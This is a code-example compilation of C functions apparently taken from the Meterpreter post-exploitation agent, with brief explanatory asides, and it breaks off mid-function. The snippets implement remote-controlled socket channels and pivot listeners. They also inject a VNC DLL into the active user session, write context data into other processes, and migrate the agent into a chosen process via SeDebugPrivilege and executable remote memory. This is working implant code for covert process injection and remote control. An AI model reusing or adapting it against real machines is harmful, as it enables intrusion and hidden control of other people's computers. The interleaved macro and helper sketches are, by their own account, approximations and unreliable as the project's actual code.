Example #1
/*
 * Shuts the socket down for either reading or writing based on the how
 * parameter supplied by the remote side
 */
DWORD request_net_socket_tcp_shutdown(Remote *remote, Packet *packet)
{
	DWORD dwResult      = ERROR_SUCCESS;
	Packet * response   = NULL;
	SocketContext * ctx = NULL;
	Channel * channel   = NULL;
	DWORD cid           = 0;
	DWORD how           = 0;

	do
	{
		dprintf( "[TCP] entering request_net_socket_tcp_shutdown" );
		response = packet_create_response( packet );
		if( !response )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. response == NULL", ERROR_NOT_ENOUGH_MEMORY );

		cid = packet_get_tlv_value_uint( packet, TLV_TYPE_CHANNEL_ID );
		how = packet_get_tlv_value_uint( packet, TLV_TYPE_SHUTDOWN_HOW );

		channel = channel_find_by_id( cid );
		if( !channel )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. channel == NULL", ERROR_INVALID_HANDLE );

		dprintf( "[TCP] request_net_socket_tcp_shutdown. channel=0x%08X, cid=%d", channel, cid );

		ctx = channel_get_native_io_context( channel );
		if( !ctx )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. ctx == NULL", ERROR_INVALID_HANDLE );

		if( shutdown( ctx->fd, how ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[TCP] request_net_socket_tcp_shutdown. shutdown failed" );

		// sf: we don't seem to need to call this here, as the channel's tcp_channel_client_local_notify() will
		// catch the socket closure and call free_socket_context() for us, due to the FD_READ|FD_CLOSE flags
		// being passed to WSAEventSelect for the notify event in create_tcp_client_channel().
		// This avoids a double call (from two different threads) and a subsequent access violation in some edge cases.
		//free_socket_context( ctx );

	} while( 0 );

	packet_transmit_response( dwResult, remote, response );

	dprintf( "[TCP] leaving request_net_socket_tcp_shutdown" );
	
	return ERROR_SUCCESS;
}
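This and the following examples all use the same error-handling convention: a single-pass do/while(0) block plus BREAK_* macros that log the failure, record an error code in dwResult, and break out so the function falls through to its cleanup/response path. As a rough sketch only, the macros are typically defined along these lines (the exact definitions live in the project's common headers and may differ in detail):

// Approximate definitions for illustration only; treat these as an assumption,
// not the project's verbatim macros.
#define BREAK_WITH_ERROR( str, err ) \
	{ dprintf( "%s. error=%d", str, (err) ); dwResult = (err); break; }

#define BREAK_ON_ERROR( str ) \
	{ dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }

#define BREAK_ON_WSAERROR( str ) \
	{ dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }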
Example #2
/*
 * Entry Point.
 */
DWORD Init( SOCKET s )
{
	DWORD dwResult              = ERROR_SUCCESS;
	BOOL bTerminate             = FALSE;
	HANDLE hMessageThread       = NULL;
	DLL_BUFFER VncDllBuffer     = {0};  
	char cCommandLine[MAX_PATH] = {0};
	DWORD dwHostSessionId       = 0;
	DWORD dwActiveSessionId     = 0;
	DWORD dwAgentSessionId      = 0xFFFFFFFF;
	BYTE bFlags                 = 0;

	__try
	{
		do
		{
			// We maintain state for the rfb stream so as not to desynchronize the remote
			// client after session switching and the injection of multiple agents server side.
			context_init();

			sock = s;
			if( sock == INVALID_SOCKET )
				BREAK_WITH_ERROR( "[LOADER] Init. INVALID_SOCKET", ERROR_INVALID_PARAMETER );
			
			if( recv( sock, (char *)&bFlags, 1, 0 ) == SOCKET_ERROR )
				BREAK_ON_WSAERROR( "[LOADER] Init. recv bFlags failed" );

			if( bFlags & VNCFLAG_DISABLECOURTESYSHELL )
				AgentContext.bDisableCourtesyShell = TRUE;

			if( bFlags & VNCFLAG_DISABLESESSIONTRACKING )
				bDisableSessionTracking = TRUE;

			dprintf( "[LOADER] Init. Starting, hAppInstance=0x%08X, sock=%d, bFlags=%d", hAppInstance, sock, bFlags );

			// get the vnc dll we will inject into the active session
			if( loader_vncdll( &VncDllBuffer ) != ERROR_SUCCESS )
				BREAK_ON_ERROR( "[LOADER] Init. loader_vncdll failed" );

			// create a socket event and have it signaled on FD_CLOSE
			hSocketCloseEvent = WSACreateEvent();
			if( hSocketCloseEvent == WSA_INVALID_EVENT )
				BREAK_ON_WSAERROR( "[LOADER] Init. WSACreateEvent failed" );

			if( WSAEventSelect( sock, hSocketCloseEvent, FD_CLOSE ) == SOCKET_ERROR )
				BREAK_ON_WSAERROR( "[LOADER] Init. WSAEventSelect failed" );

			// get the session id that our host process belongs to
			dwHostSessionId = session_id( GetCurrentProcessId() );

			hMessageThread = CreateThread( NULL, 0, context_message_thread, NULL, 0, NULL );
			if( !hMessageThread )
				BREAK_ON_ERROR( "[LOADER] Init. CreateThread context_message_thread failed" );

			// loop until the remote client closes the connection, creating a VNC
			// server agent inside the active session whenever the active session changes
			while( !bTerminate )
			{
				// in case we have been waiting for a session to attach to the physical  
				// console and the remote client has quit, we detect this here...
				if( WaitForSingleObject( hSocketCloseEvent, 0 ) == WAIT_OBJECT_0 )
				{
					dprintf( "[LOADER] Init. Remote socket closed, terminating1..." );
					break;
				}

				// get the session id for the interactive session
				dwActiveSessionId = session_activeid();
			
				// test if there is no session currently attached to the physical console...
				if( dwActiveSessionId == 0xFFFFFFFF )
				{
					dprintf( "[LOADER] Init. no session currently attached to the physical console..." );
					// just try to wait it out...
					Sleep( 250 );
					continue;
				}
				else if( dwActiveSessionId == dwAgentSessionId )
				{
					dprintf( "[LOADER] Init. dwActiveSessionId == dwAgentSessionId..." );
					// just try to wait it out...
					Sleep( 250 );
					continue;
				}

				// do the local process or session injection
				if( dwHostSessionId != dwActiveSessionId )
				{
					dprintf( "[LOADER] Init. Injecting into active session %d...", dwActiveSessionId );
					if( session_inject( dwActiveSessionId, &VncDllBuffer ) != ERROR_SUCCESS )
						BREAK_WITH_ERROR( "[LOADER] Init. session_inject failed", ERROR_ACCESS_DENIED );
				}
				else
				{
					dprintf( "[LOADER] Init. Allready in the active session %d.", dwActiveSessionId );
					if( ps_inject( GetCurrentProcessId(), &VncDllBuffer ) != ERROR_SUCCESS  )
						BREAK_WITH_ERROR( "[LOADER] Init. ps_inject current process failed", ERROR_ACCESS_DENIED );
				}
				
				dwAgentSessionId = dwActiveSessionId;

				// loop, waiting for either the agents process to die, the remote socket to die or
				// the active session to change...
				while( TRUE )
				{
					HANDLE hEvents[2]  = {0};
					DWORD dwWaitResult = 0;

					// wait for these event to be signaled or a timeout to occur...
					hEvents[0]   = hSocketCloseEvent;
					hEvents[1]   = hAgentProcess;
					dwWaitResult = WaitForMultipleObjects( 2, hEvents, FALSE, 250 );
					
					// bail if we have somehow failed (e.g. invalid handle)
					if( dwWaitResult == WAIT_FAILED )
					{
						dprintf( "[LOADER] Init. WaitForMultipleObjects failed." );
						// if we cant synchronize we bail out...
						bTerminate = TRUE;
						break;
					}
					// if we have just timed out, test the current active session...
					else if( dwWaitResult == WAIT_TIMEOUT )
					{
						// if the agent is still in the active session just continue...
						if( dwAgentSessionId == session_activeid() )
							continue;
						// if we are not to perform session tracking try and stay in the current session (as it might become the active input session at a later stage)
						if( bDisableSessionTracking )
						{
							dprintf( "[LOADER] Init. Active session has changed, trying to stay in current session as session tracking disabled..." );
							Sleep( 500 );
							continue;
						}
						// if the agent is no longer in the active session we signal the agent to terminate
						if( !ReleaseMutex( hAgentCloseEvent ) )
							dprintf( "[LOADER] Init. ReleaseMutex 1 hAgentCloseEvent failed. error=%d", GetLastError() );							
						dprintf( "[LOADER] Init. Active session has changed. Moving agent into new session..." );
						dwAgentSessionId = 0xFFFFFFFF;
						// and we go inject a new agent into the new active session (or terminate if session tracking disabled)
						loader_agent_close();
						break;
					}
					// sanity check the result for an abandoned mutex
					else if( (dwWaitResult >= WAIT_ABANDONED_0) && (dwWaitResult <= (WAIT_ABANDONED_0 + 1)) )
					{
						dprintf( "[LOADER] Init. WAIT_ABANDONED_0 for %d", dwWaitResult - WAIT_ABANDONED_0 );
						bTerminate = TRUE;
						break;
					}
					else
					{
						// otherwise if we have an event signaled, handle it
						switch( dwWaitResult - WAIT_OBJECT_0 )
						{
							case 0:
								dprintf( "[LOADER] Init. Remote socket closed, terminating2..." );
								bTerminate = TRUE;
								if( !ReleaseMutex( hAgentCloseEvent ) )
									dprintf( "[LOADER] Init. ReleaseMutex 2 hAgentCloseEvent failed. error=%d", GetLastError() );
								break;
							case 1:
								dprintf( "[LOADER] Init. Injected agent's process has terminated..." );
								loader_agent_close();
								dwAgentSessionId = 0xFFFFFFFF;
								break;
							default:
								dprintf( "[LOADER] Init. WaitForMultipleObjects returned dwWaitResult=0x%08X", dwWaitResult );
								bTerminate = TRUE;
								if( !ReleaseMutex( hAgentCloseEvent ) )
									dprintf( "[LOADER] Init. ReleaseMutex 3 hAgentCloseEvent failed. error=%d", GetLastError() );
								break;
						}
					}

					// get out of this loop...
					break;
				}

			}

		} while( 0 );
	
		CLOSE_HANDLE( hSocketCloseEvent );

		loader_agent_close();

		closesocket( sock );

		if( hMessageThread )
			TerminateThread( hMessageThread, 0 );
	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		dprintf( "[LOADER] Init. EXCEPTION_EXECUTE_HANDLER\n\n" );
	}

	dprintf( "[LOADER] Init. Finished." );

	return dwResult;
}
Example #3
/*
 * A pre-injection hook called before our DLL is injected into a process.
 */
DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
{
	DWORD dwResult               = ERROR_SUCCESS;
	LPVOID lpMemory              = NULL;
	AGENT_CTX RemoteAgentContext = {0};
	int i                        = 0;

	do
	{
		if( !hProcess || !cpCommandLine )
			BREAK_WITH_ERROR( "[LOADER] loader_inject_pre. !hProcess || !cpCommandLine", ERROR_INVALID_PARAMETER );

		// Use User32!WaitForInputIdle to slow things down so that if it's a new
		// process (like a new winlogon.exe) it has a chance to initialize...
		// Bad things happen if we inject into an uninitialized process.
		WaitForInputIdle( hProcess, 10000 );

		CLOSE_HANDLE( hAgentCloseEvent );
		CLOSE_HANDLE( hAgentProcess );

		memcpy( &RemoteAgentContext, &AgentContext, sizeof(AGENT_CTX) );

		hAgentCloseEvent = CreateMutex( NULL, TRUE, NULL );
		if( !hAgentCloseEvent )
			BREAK_ON_ERROR( "[LOADER] loader_inject_pre. CreateEvent hAgentCloseEvent failed" );

		if( !DuplicateHandle( GetCurrentProcess(), hAgentCloseEvent, hProcess, &RemoteAgentContext.hCloseEvent, 0, FALSE, DUPLICATE_SAME_ACCESS ) )
			BREAK_ON_ERROR( "[LOADER] loader_inject_pre. DuplicateHandle hAgentCloseEvent failed" )
		
		dprintf( "[LOADER] WSADuplicateSocket for sock=%d", sock );

		// Duplicate the socket for the target process
		if( WSADuplicateSocket( sock, dwPid, &RemoteAgentContext.info ) != NO_ERROR )
			BREAK_ON_WSAERROR( "[LOADER] WSADuplicateSocket failed" )
	
		// Allocate memory for the migrate stub, context and payload
		lpMemory = VirtualAllocEx( hProcess, NULL, sizeof(AGENT_CTX), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
		if( !lpMemory )
			BREAK_ON_ERROR( "[LOADER] VirtualAllocEx failed" )
		
		/*for( i=0 ; i<4 ; i++ )
		{
			DWORD dwSize = 0;

			if( !AgentContext.dictionaries[i] )
				continue;
			
			dwSize = ( sizeof(DICTMSG) + AgentContext.dictionaries[i]->dwDictLength );

			RemoteAgentContext.dictionaries[i] = VirtualAllocEx( hProcess, NULL, dwSize, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
			if( !RemoteAgentContext.dictionaries[i] )
				continue;

			if( !WriteProcessMemory( hProcess, RemoteAgentContext.dictionaries[i], AgentContext.dictionaries[i], dwSize, NULL ) )
				RemoteAgentContext.dictionaries[i] = NULL;
		}*/

		// Write the ctx to memory...
		if( !WriteProcessMemory( hProcess, lpMemory, &RemoteAgentContext, sizeof(AGENT_CTX), NULL ) )
			BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 1 failed" )

		hAgentProcess = hProcess;

		_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );

	} while( 0 );

	if( dwResult != ERROR_SUCCESS )
	{
		dprintf( "[LOADER] loader_inject_pre. CLOSE_HANDLE( hAgentCloseEvent );" );
		CLOSE_HANDLE( hAgentCloseEvent );
	}

	return dwResult;
}
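loader_inject_pre shares the loader's socket with the target process by calling WSADuplicateSocket and copying the resulting WSAPROTOCOL_INFO into the remote AGENT_CTX. For context, the receiving side would typically rebuild a usable descriptor from that structure. The helper below is a hypothetical sketch of that receiving step, not part of the loader source:

// Hypothetical helper (assumption, not in the original source): rebuild the socket
// from the WSAPROTOCOL_INFO that loader_inject_pre copied into the remote AGENT_CTX.
SOCKET reconstruct_duplicated_socket( WSAPROTOCOL_INFO * info )
{
	WSADATA wsa = {0};

	// The duplicated socket is only usable once Winsock is initialised in this process.
	if( WSAStartup( MAKEWORD(2,2), &wsa ) != 0 )
		return INVALID_SOCKET;

	// Passing the protocol info to WSASocket yields a new descriptor referring to
	// the same underlying socket the loader duplicated for us.
	return WSASocket( FROM_PROTOCOL_INFO, FROM_PROTOCOL_INFO, FROM_PROTOCOL_INFO, info, 0, 0 );
}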
Example #4
/*!
 * @brief Allocates a streaming TCP server channel.
 * @param remote Pointer to the remote instance.
 * @param packet Pointer to the request packet.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Opening the server channel completed successfully.
 */
DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpServerContext * ctx = NULL;
    Packet * response = NULL;
    char * localHost = NULL;
    StreamChannelOps chops = { 0 };
    USHORT localPort = 0;
    BOOL v4Fallback = FALSE;

    do
    {
        response = packet_create_response(packet);
        if (!response)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        ctx = (TcpServerContext *)malloc(sizeof(TcpServerContext));
        if (!ctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        memset(ctx, 0, sizeof(TcpServerContext));

        ctx->remote = remote;

        localPort = (USHORT)(packet_get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
        if (!localPort)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. localPort == NULL", ERROR_INVALID_HANDLE);
        }

        localHost = packet_get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);

        ctx->fd = WSASocket(AF_INET6, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
        if (ctx->fd == INVALID_SOCKET)
        {
            v4Fallback = TRUE;
        }
        else
        {
            int no = 0;
            if (setsockopt(ctx->fd, IPPROTO_IPV6, IPV6_V6ONLY, (char*)&no, sizeof(no)) == SOCKET_ERROR)
            {
                // Fall back to IPv4 - we're probably running on Windows XP or earlier, which means
                // that to support both IPv4 and IPv6 we'd need two separate sockets. IPv6 on XP
                // isn't that common, so we just revert to v4 and listen on that single address.
                closesocket(ctx->fd);
                v4Fallback = TRUE;
            }
        }

        struct sockaddr_in6 sockAddr = { 0 };
        DWORD sockAddrSize = 0;

        if (v4Fallback)
        {
            struct sockaddr_in* v4Addr = (struct sockaddr_in*)&sockAddr;
            v4Addr->sin_addr.s_addr = localHost == NULL ? htonl(INADDR_ANY) : inet_addr(localHost);
            v4Addr->sin_family = AF_INET;
            v4Addr->sin_port = htons(localPort);
            sockAddrSize = sizeof(struct sockaddr_in);
        }
        else
        {
            // TODO: add IPv6 address binding support
            sockAddr.sin6_addr = in6addr_any;
            sockAddr.sin6_family = AF_INET6;
            sockAddr.sin6_port = htons(localPort);
            sockAddrSize = sizeof(struct sockaddr_in6);
        }

        if (bind(ctx->fd, (SOCKADDR *)&sockAddr, sockAddrSize) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
        }

        if (listen(ctx->fd, SOMAXCONN) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. listen failed");
        }

        ctx->notify = WSACreateEvent();
        if (ctx->notify == WSA_INVALID_EVENT)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed");
        }

        if (WSAEventSelect(ctx->fd, ctx->notify, FD_ACCEPT) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
        }

        ctx->ipv6 = !v4Fallback;

        memset(&chops, 0, sizeof(StreamChannelOps));
        chops.native.context = ctx;
        chops.native.close = tcp_channel_server_close;

        ctx->channel = channel_create_stream(0, CHANNEL_FLAG_SYNCHRONOUS, &chops);
        if (!ctx->channel)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE);
        }

        scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL);

        packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel));

        dprintf("[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", localHost, localPort, channel_get_id(ctx->channel));

    } while (0);

    packet_transmit_response(dwResult, remote, response);

    do
    {
        if (dwResult == ERROR_SUCCESS)
        {
            break;
        }

        dprintf("[TCP-SERVER] Error encountered %u 0x%x", dwResult, dwResult);

        if (!ctx)
        {
            break;
        }

        if (ctx->fd)
        {
            dprintf("[TCP-SERVER] Destroying socket");
            closesocket(ctx->fd);
        }

        if (ctx->channel)
        {
            dprintf("[TCP-SERVER] Destroying channel");
            channel_destroy(ctx->channel, packet);
        }

        free(ctx);

    } while (0);

    return dwResult;
}
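The v4Fallback logic above implements the standard dual-stack trick: open an AF_INET6 socket and clear IPV6_V6ONLY so IPv4 clients arrive as v4-mapped addresses, reverting to a plain IPv4 socket where the option is unsupported (e.g. Windows XP). A minimal standalone sketch of just that pattern, assuming Winsock is already initialised (create_dual_stack_listener is a hypothetical name):

// Minimal sketch of the dual-stack listener used above.
SOCKET create_dual_stack_listener( USHORT port )
{
    struct sockaddr_in6 addr = { 0 };
    int no = 0;

    SOCKET fd = WSASocket( AF_INET6, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0 );
    if( fd == INVALID_SOCKET )
        return INVALID_SOCKET;

    // On Vista and later this makes the socket dual-stack; where the option is
    // unsupported the caller would fall back to a plain AF_INET socket instead.
    if( setsockopt( fd, IPPROTO_IPV6, IPV6_V6ONLY, (char *)&no, sizeof(no) ) == SOCKET_ERROR )
    {
        closesocket( fd );
        return INVALID_SOCKET;
    }

    addr.sin6_family = AF_INET6;
    addr.sin6_addr   = in6addr_any;
    addr.sin6_port   = htons( port );

    if( bind( fd, (SOCKADDR *)&addr, sizeof(addr) ) == SOCKET_ERROR ||
        listen( fd, SOMAXCONN ) == SOCKET_ERROR )
    {
        closesocket( fd );
        return INVALID_SOCKET;
    }

    return fd;
}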
Example #5
/*!
 * @brief Notify routine for a TCP server channel to pick up its new client connections.
 * @param remote Pointer to the remote instance.
 * @param serverCtx Pointer to the TCP server context.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Notification completed successfully.
 */
DWORD tcp_channel_server_notify(Remote * remote, TcpServerContext * serverCtx)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpClientContext* clientctx = NULL;
    Packet* request = NULL;
    SOCKADDR_IN6 clientaddr = { 0 };
    SOCKADDR_IN6 serveraddr = { 0 };
    SOCKET sock = 0;
    DWORD size = 0;
    char* localhost = NULL;
    char* peerhost = NULL;
    int localport = 0;
    int peerport = 0;

    do
    {
        if (!serverCtx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. serverCtx == NULL", ERROR_INVALID_HANDLE);
        }

        ResetEvent(serverCtx->notify);

        size = sizeof(SOCKADDR_IN6);

        sock = accept(serverCtx->fd, (SOCKADDR*)&clientaddr, &size);
        if (sock == INVALID_SOCKET)
        {
            if (WSAGetLastError() == WSAEWOULDBLOCK)
            {
                Sleep(100);
                break;
            }

            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_notify. accept failed");
        }

        dprintf("[TCP-SERVER] tcp_channel_server_notify. Got new client connection on channel %d. sock=%d", channel_get_id(serverCtx->channel), sock);

        clientctx = tcp_channel_server_create_client(serverCtx, sock);
        if (!clientctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. clientctx == NULL", ERROR_INVALID_HANDLE);
        }

        size = sizeof(SOCKADDR_IN6);

        if (getsockname(serverCtx->fd, (SOCKADDR *)&serveraddr, &size) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. getsockname failed");
        }

        if (!serverCtx->ipv6)
        {
            localhost = inet_ntoa(((SOCKADDR_IN*)&serveraddr)->sin_addr);
        }

        if (!localhost)
        {
            localhost = "";
        }

        localport = ntohs(serverCtx->ipv6 ? serveraddr.sin6_port : ((SOCKADDR_IN*)&serveraddr)->sin_port);

        if (!serverCtx->ipv6)
        {
            peerhost = inet_ntoa(((SOCKADDR_IN*)&clientaddr)->sin_addr);
        }

        if (!peerhost)
        {
            peerhost = "";
        }

        peerport = ntohs(serverCtx->ipv6 ? clientaddr.sin6_port : ((SOCKADDR_IN*)&clientaddr)->sin_port);

        dprintf("[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport);

        request = packet_create(PACKET_TLV_TYPE_REQUEST, "tcp_channel_open");
        if (!request)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. packet_create failed", ERROR_INVALID_HANDLE);
        }

        packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_ID, channel_get_id(clientctx->channel));
        packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_PARENTID, channel_get_id(serverCtx->channel));
        packet_add_tlv_string(request, TLV_TYPE_LOCAL_HOST, localhost);
        packet_add_tlv_uint(request, TLV_TYPE_LOCAL_PORT, localport);
        packet_add_tlv_string(request, TLV_TYPE_PEER_HOST, peerhost);
        packet_add_tlv_uint(request, TLV_TYPE_PEER_PORT, peerport);

        dwResult = PACKET_TRANSMIT(serverCtx->remote, request, NULL);

    } while (0);

    return dwResult;
}
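Note that the routine above only produces printable addresses for IPv4 (via inet_ntoa); when the server socket is IPv6 the host strings stay empty. One way to cover both families is InetNtop (available on Vista and later). The helper below is a hypothetical sketch, not part of the original source:

// Hypothetical helper (assumption): render either address family from the
// SOCKADDR_IN6 storage used above. Requires Vista or later for InetNtopA.
static const char * render_addr( BOOL ipv6, SOCKADDR_IN6 * addr, char * buf, size_t len )
{
    if( ipv6 )
        return InetNtopA( AF_INET6, &addr->sin6_addr, buf, len );

    return InetNtopA( AF_INET, &((SOCKADDR_IN *)addr)->sin_addr, buf, len );
}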
Example #6
/*!
 * @brief Create a TCP client channel from a socket.
 * @param serverCtx Pointer to the TCP server context.
 * @param sock The socket handle.
 * @returns Pointer to the newly created client context.
 */
TcpClientContext * tcp_channel_server_create_client(TcpServerContext * serverCtx, SOCKET sock)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpClientContext * clientctx = NULL;
    StreamChannelOps chops = { 0 };

    do
    {
        if (!serverCtx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. serverCtx == NULL", ERROR_INVALID_HANDLE);
        }

        clientctx = (TcpClientContext *)malloc(sizeof(TcpClientContext));
        if (!clientctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        memset(clientctx, 0, sizeof(TcpClientContext));

        clientctx->remote = serverCtx->remote;
        clientctx->fd = sock;

        clientctx->notify = WSACreateEvent();
        if (clientctx->notify == WSA_INVALID_EVENT)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSACreateEvent failed");
        }

        if (WSAEventSelect(clientctx->fd, clientctx->notify, FD_READ | FD_CLOSE) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSAEventSelect failed");
        }

        memset(&chops, 0, sizeof(StreamChannelOps));

        chops.native.context = clientctx;
        chops.native.write = tcp_channel_client_write;
        chops.native.close = tcp_channel_client_close;

        clientctx->channel = channel_create_stream(0, 0, &chops);
        if (!clientctx->channel)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx->channel == NULL", ERROR_INVALID_HANDLE);
        }

        dwResult = scheduler_insert_waitable(clientctx->notify, clientctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL);

    } while (0);

    if (dwResult != ERROR_SUCCESS)
    {
        if (clientctx)
        {
            free(clientctx);
            clientctx = NULL;
        }
    }

    return clientctx;
}
Example #7
/*!
 * @brief Migrate the meterpreter server from the current process into another process.
 * @param remote Pointer to the \c Remote instance.
 * @param packet Pointer to the request packet.
 * @param pResult Pointer to the memory that will receive the result.
 * @returns Indication of whether the server should continue processing or not.
 */
BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResult)
{
	DWORD dwResult = ERROR_SUCCESS;
	Packet * response = NULL;
	HANDLE hToken = NULL;
	HANDLE hProcess = NULL;
	HANDLE hEvent = NULL;
	BYTE * lpPayloadBuffer = NULL;
	LPVOID lpMigrateStub = NULL;
	LPBYTE lpMemory = NULL;
	MIGRATECONTEXT ctx = { 0 };
	DWORD dwMigrateStubLength = 0;
	DWORD dwPayloadLength = 0;
	DWORD dwProcessID = 0;
	DWORD dwDestinationArch = 0;

	MetsrvConfig* config = NULL;
	DWORD configSize = 0;

	do
	{
		response = packet_create_response(packet);
		if (!response)
		{
			dwResult = ERROR_NOT_ENOUGH_MEMORY;
			break;
		}

		// Get the process identifier to inject into
		dwProcessID = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);

		// Get the target process architecture to inject into
		dwDestinationArch = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ARCH);

		// Get the length of the payload buffer
		dwPayloadLength = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN);

		// Receive the actual migration payload buffer
		lpPayloadBuffer = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD);

		dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s, PayloadLength=%d", dwProcessID, (dwDestinationArch == 2 ? "x64" : "x86"), dwPayloadLength);

		// If we can, get SeDebugPrivilege...
		if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
		{
			TOKEN_PRIVILEGES priv = { 0 };

			priv.PrivilegeCount = 1;
			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

			if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
			{
				if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL))
				{
					dprintf("[MIGRATE] Got SeDebugPrivilege!");
				}
			}

			CloseHandle(hToken);
		}

		// Open the process so that we can migrate into it
		hProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID);
		if (!hProcess)
		{
			BREAK_ON_ERROR("[MIGRATE] OpenProcess failed")
		}

		// get the existing configuration
		dprintf("[MIGRATE] creating the configuration block");
		remote->config_create(remote, &config, &configSize);
		dprintf("[MIGRATE] Config of %u bytes stashed at 0x%p", configSize, config);

		if (config->session.comms_fd)
		{
			// Duplicate the socket for the target process if we are SSL based
			if (WSADuplicateSocket(config->session.comms_fd, dwProcessID, &ctx.info) != NO_ERROR)
			{
				BREAK_ON_WSAERROR("[MIGRATE] WSADuplicateSocket failed")
			}
		}

		// Create a notification event that we'll use to know when it's safe to exit 
		// (once the socket has been referenced in the other process)
		hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
		if (!hEvent)
		{
			BREAK_ON_ERROR("[MIGRATE] CreateEvent failed")
		}

		// Duplicate the event handle for the target process
		if (!DuplicateHandle(GetCurrentProcess(), hEvent, hProcess, &ctx.e.hEvent, 0, TRUE, DUPLICATE_SAME_ACCESS))
		{
			BREAK_ON_ERROR("[MIGRATE] DuplicateHandle failed")
		}

		// Get the architecture specific process migration stub...
		if (dwDestinationArch == PROCESS_ARCH_X86)
		{
			lpMigrateStub = (LPVOID)&migrate_stub_x86;
			dwMigrateStubLength = sizeof(migrate_stub_x86);
		}
		else if (dwDestinationArch == PROCESS_ARCH_X64)
		{
			lpMigrateStub = (LPVOID)&migrate_stub_x64;
			dwMigrateStubLength = sizeof(migrate_stub_x64);
		}
		else
		{
			SetLastError(ERROR_BAD_ENVIRONMENT);
			dprintf("[MIGRATE] Invalid target architecture: %u", dwDestinationArch);
			break;
		}

		// Allocate memory for the migrate stub, context, payload and configuration block
		lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		if (!lpMemory)
		{
			BREAK_ON_ERROR("[MIGRATE] VirtualAllocEx failed")
		}

		// Calculate the address of the payload...
		ctx.p.lpPayload = lpMemory + dwMigrateStubLength + sizeof(MIGRATECONTEXT);

		// Write the migrate stub to memory...
